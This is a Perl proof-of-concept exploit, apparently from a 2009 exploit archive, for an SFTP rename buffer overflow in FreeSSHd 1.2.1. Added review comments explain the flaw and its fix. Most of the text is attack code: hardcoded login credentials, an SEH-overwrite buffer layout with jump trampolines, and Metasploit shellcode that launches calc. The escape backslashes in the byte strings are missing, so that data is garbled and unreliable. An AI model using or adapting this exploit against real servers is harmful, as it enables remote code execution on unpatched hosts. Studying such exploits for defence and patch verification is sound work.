# Title : FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit (SEH)
# Published : 2009-03-27
# Author : r0ut3r
# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit
#
# Advisory: http://www.bmgsec.com.au/advisory/45/
# Original: http://www.bmgsec.com.au/advisory/32/
# Related : http://www.bmgsec.com.au/advisory/42/
#
# Test box: WinXP Pro SP2 English
#
# Exploit code for a vulnerability I discovered some time
# ago in FreeSSHd 1.2.1. This code should be run from a
# user named "root", or adjust the payload for your
# username. I've left space for adjustments. Up to the
# first six NOPs can be used (inclusive).
#
# The code exploits a vulnerability in the SFTP Rename
# operation. The vulnerability was patched in 1.2.2.
#
# 00416F98 50 PUSH EAX
# 00416F99 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148]
# 00416F9F 50 PUSH EAX
# 00416FA0 E8 45B50400 CALL <JMP.&MSVCRT.strcpy>
#
#
# Written and discovered by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
# Proof-of-concept script for the FreeSSHd 1.2.1 SFTP rename overflow
# described in the header: the server copies the rename source path with
# an unbounded strcpy() into a fixed-size stack buffer (the disassembly
# above shows the destination at EBP-148), so an over-long path name
# overwrites the SEH chain.  The header states the issue was fixed in
# FreeSSHd 1.2.2; upgrading is the mitigation.  Any SFTP rename request
# whose path is far longer than a plausible file name is the observable
# signature of this technique (inferred from the payload layout below).
#
# NOTE(review): the script has no `use strict; use warnings;`, and the
# string escapes on this page appear to have lost their backslashes
# (e.g. the trailing `n` in messages, `x90`), which looks like an
# extraction artifact.  Values are documented here exactly as shown.
use Net::SSH2;
# Credentials and target.  The header says the payload layout assumes the
# user name "root"; a different user name changes how much of the NOP
# sled survives, hence the "adjust the payload" remark above.
my $user = "root";
my $pass = "yahh";
my $ip = "127.0.0.1";
my $port = 22;
my $ssh2 = Net::SSH2->new();
print "[+] Connecting...n";
# Connection failure is fatal.
$ssh2->connect($ip, $port) || die "[-] Unable to connect!n";
# NOTE(review): `||` followed by a bare string literal is a no-op — an
# authentication failure is neither reported nor fatal here, so the
# script falls through to sftp() on an unauthenticated session.  This is
# an authenticated attack: a valid account is required to reach the
# vulnerable rename handler.
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentialsn";
print "[+] Sending payloadn";
# Payload building blocks (package globals; no `my` because strict is off).
$nop = "x90";
$padding = 'A' x 105;
my $SEH = "x21x11x40x00"; # SEH handler overwrite: pop, pop, ret at 0x00401121 inside freeSSHdServer.exe (header: "Universal")
my $nextSEH = "xEBxF0x90x90"; # next-SEH slot: short backward jump (jmp short 240), nop, nop
# Second-stage trampoline: a relative jump back over the padding into the
# shellcode placed earlier in the buffer.
$mShellcode = "xE9xF2xFExFFxFF";
# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com
# Harmless demonstration payload (launches calc.exe) — proof of code
# execution only.
my $shellcode =
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x02".
"x28x29x10x83xebxfcxe2xf4xfexc0x6dx10x02x28xa2x55".
"x3exa3x55x15x7ax29xc6x9bx4dx30xa2x4fx22x29xc2x59".
"x89x1cxa2x11xecx19xe9x89xaexacxe9x64x05xe9xe3x1d".
"x03xeaxc2xe4x39x7cx0dx14x77xcdxa2x4fx26x29xc2x76".
"x89x24x62x9bx5dx34x28xfbx89x34xa2x11xe9xa1x75x34".
"x06xebx18xd0x66xa3x69x20x87xe8x51x1cx89x68x25x9b".
"x72x34x84x9bx6ax20xc2x19x89xa8x99x10x02x28xa2x78".
"x3ex77x18xe6x62x7exa0xe8x81xe8x52x40x6ax56xf1xf2".
"x71x40xb1xeex88x26x7exefxe5x4bx48x7cx61x28x29x10";
# Buffer layout (low to high address): 6 NOPs, shellcode, 105 bytes of
# filler, the backward-jump trampoline, 9 NOPs, then the next-SEH and
# SEH-handler slots that land on the overwritten exception record.
my $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH;
my $sftp = $ssh2->sftp();
# The over-long source path is what overflows the server-side buffer;
# the destination name 'B' is irrelevant.  The return value is not
# checked, so "[+] Sent" is printed regardless of outcome.
$sftp->rename($payload, 'B');
print "[+] Sent";
$ssh2->disconnect;